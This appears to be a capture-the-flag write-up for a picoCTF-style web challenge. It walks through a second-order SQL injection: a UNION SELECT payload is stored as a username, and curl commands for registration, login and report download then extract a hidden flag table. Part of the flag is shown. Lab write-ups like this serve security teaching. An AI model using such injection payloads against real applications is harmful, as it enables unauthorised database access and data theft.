Description
Can you try to get the flag from our website? I've prepared my queries everywhere! I think!
Setup
Launch the challenge instance and open the web application.
Register an account to explore the application's features.
Solution
- Step 1Register with a UNION SELECT payload as your usernameThe application generates reports that include your username in a SQL query without sanitisation. Register a new account using a SQL UNION SELECT injection as the username. This is a second-order injection -- the payload is stored first, then executed later when a report is generated.# Register with this username:curl -d "username=b' UNION SELECT name, value, '2026-01-01' FROM aDNyM19uMF9mMTRn --&password=test123" \ http://<HOST>:<PORT_FROM_INSTANCE>/register# Then log in:curl -c cookie.jar -d "username=b' UNION SELECT name, value, '2026-01-01' FROM aDNyM19uMF9mMTRn --&password=test123" \ http://<HOST>:<PORT_FROM_INSTANCE>/login
- Step 2Generate and download the reportTrigger the report generation feature. When the app builds the report query using your stored username, the UNION SELECT fires and appends rows from the hidden flag table (aDNyM19uMF9mMTRn) to the output. Download the report as CSV.curl -b cookie.jar http://<HOST>:<PORT_FROM_INSTANCE>/report/generatecurl -b cookie.jar http://<HOST>:<PORT_FROM_INSTANCE>/report/download# The CSV contains: flag, picoCTF{...}
Flag
picoCTF{0rd3r_0rd3r_sql1_...}
Second-order SQL injection via username. Register with `b' UNION SELECT name, value, '2026-01-01' FROM aDNyM19uMF9mMTRn --` as your username. When the report is generated, the injection appends rows from the flag table to the CSV output.